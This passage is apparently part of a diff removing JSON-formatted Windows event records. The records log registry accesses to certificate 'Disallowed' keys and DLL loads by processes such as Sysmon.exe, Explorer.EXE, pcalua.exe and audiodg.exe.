"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573975580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573975580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573975580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573975580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573975580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573975580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "atlthunk.dll", - "image_path": "C:\\Windows\\System32\\atlthunk.dll", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883573975259984, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:000000000008056A", - "registry_value": "W32:000000000008056A", - "timestamp": 131883573975580000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:000000000008056A", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:000000000008056A\\VirtualDesktop", - "registry_value": "VirtualDesktop", - "timestamp": 131883573975580000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573975580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 4, - "process_name": "System", - "process_path": "System", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000", - "registry_value": "S-1-5-21-2047549730-3016700585-885829632-1000", - "timestamp": 131883573975580000, - "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}" - }, - { - "event_type": "registry", - "pid": 4, - "process_name": "System", - "process_path": "System", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\\\Device\\HarddiskVolume1\\Windows\\System32", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\\\Device\\HarddiskVolume1\\Windows\\System32\\pcalua.exe", - "registry_value": "pcalua.exe", - "timestamp": 131883573975580000, - "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}" - }, - { - "event_type": "registry", - "pid": 4, - "process_name": "System", - "process_path": "System", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\SequenceNumber", - "registry_value": "SequenceNumber", - "timestamp": 131883573975580000, - "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}" - }, - { - "event_type": "registry", - "pid": 5824, - "process_name": "SearchIndexer.exe", - "process_path": "C:\\WINDOWS\\system32\\SearchIndexer.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows Search\\Gather\\Windows\\SystemIndex", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows Search\\Gather\\Windows\\SystemIndex\\NewClientID", - "registry_value": "NewClientID", - "timestamp": 131883573975740000, - "unique_pid": "{42FC7E13-B303-5C05-0000-0010823E0600}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ActivityDataModel\\ReaderRevisionInfo", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ActivityDataModel\\ReaderRevisionInfo\\C9DD546D-51CE-5F51-47F7-F7BA79663637", - "registry_value": "C9DD546D-51CE-5F51-47F7-F7BA79663637", - "timestamp": 131883573975740000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573975740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573975740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573975740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573975740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573975740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573975740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573975740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573975740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573975740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573975740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573975740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573975740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573975740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573975740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573975740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573975740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573975740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573975740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573975740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573975740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573975740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573975740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573975740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "audiodg.exe", - "image_path": "C:\\Windows\\System32\\audiodg.exe", - "pid": 6784, - "process_name": "audiodg.exe", - "process_path": "C:\\Windows\\System32\\audiodg.exe", - "timestamp": 131883573975259984, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6784, - "process_name": "audiodg.exe", - "process_path": "C:\\Windows\\System32\\audiodg.exe", - "timestamp": 131883573975890000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6784, - "process_name": "audiodg.exe", - "process_path": "C:\\Windows\\System32\\audiodg.exe", - "timestamp": 131883573975890000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 6784, - "process_name": "audiodg.exe", - "process_path": "C:\\Windows\\System32\\audiodg.exe", - "timestamp": 131883573975890000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "image_load", - "image_name": "combase.dll", - "image_path": "C:\\Windows\\System32\\combase.dll", - "pid": 6784, - "process_name": "audiodg.exe", - "process_path": "C:\\Windows\\System32\\audiodg.exe", - "timestamp": 131883573975890000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6784, - "process_name": "audiodg.exe", - "process_path": "C:\\Windows\\System32\\audiodg.exe", - "timestamp": 131883573975890000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "image_load", - "image_name": "bcryptprimitives.dll", - "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", - "pid": 6784, - "process_name": "audiodg.exe", - "process_path": "C:\\Windows\\System32\\audiodg.exe", - "timestamp": 131883573975890000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "image_load", - "image_name": "cfgmgr32.dll", - "image_path": "C:\\Windows\\System32\\cfgmgr32.dll", - "pid": 6784, - "process_name": "audiodg.exe", - "process_path": "C:\\Windows\\System32\\audiodg.exe", - "timestamp": 131883573975890000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 6784, - "process_name": "audiodg.exe", - "process_path": "C:\\Windows\\System32\\audiodg.exe", - "timestamp": 131883573975890000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573975890000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "devobj.dll", - "image_path": "C:\\Windows\\System32\\devobj.dll", - "pid": 6784, - "process_name": "audiodg.exe", - "process_path": "C:\\Windows\\System32\\audiodg.exe", - "timestamp": 131883573975890000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "image_load", - "image_name": "propsys.dll", - "image_path": "C:\\Windows\\System32\\propsys.dll", - "pid": 6784, - "process_name": "audiodg.exe", - "process_path": "C:\\Windows\\System32\\audiodg.exe", - "timestamp": 131883573975890000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "image_load", - "image_name": "MMDevAPI.dll", - "image_path": "C:\\Windows\\System32\\MMDevAPI.dll", - "pid": 6784, - "process_name": "audiodg.exe", - "process_path": "C:\\Windows\\System32\\audiodg.exe", - "timestamp": 131883573975890000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6784, - "process_name": "audiodg.exe", - "process_path": "C:\\Windows\\System32\\audiodg.exe", - "timestamp": 131883573975890000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "image_load", - "image_name": "oleaut32.dll", - "image_path": "C:\\Windows\\System32\\oleaut32.dll", - "pid": 6784, - "process_name": "audiodg.exe", - "process_path": "C:\\Windows\\System32\\audiodg.exe", - "timestamp": 131883573975890000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "image_load", - "image_name": "msvcp_win.dll", - "image_path": "C:\\Windows\\System32\\msvcp_win.dll", - "pid": 6784, - "process_name": "audiodg.exe", - "process_path": "C:\\Windows\\System32\\audiodg.exe", - "timestamp": 131883573975890000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "image_load", - "image_name": "SHCore.dll", - "image_path": "C:\\Windows\\System32\\SHCore.dll", - "pid": 6784, - "process_name": "audiodg.exe", - "process_path": "C:\\Windows\\System32\\audiodg.exe", - "timestamp": 131883573976050000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573976050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573976050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573976050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573976050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573976050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573976050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573976050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573976050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573976050000, - "unique_pid": 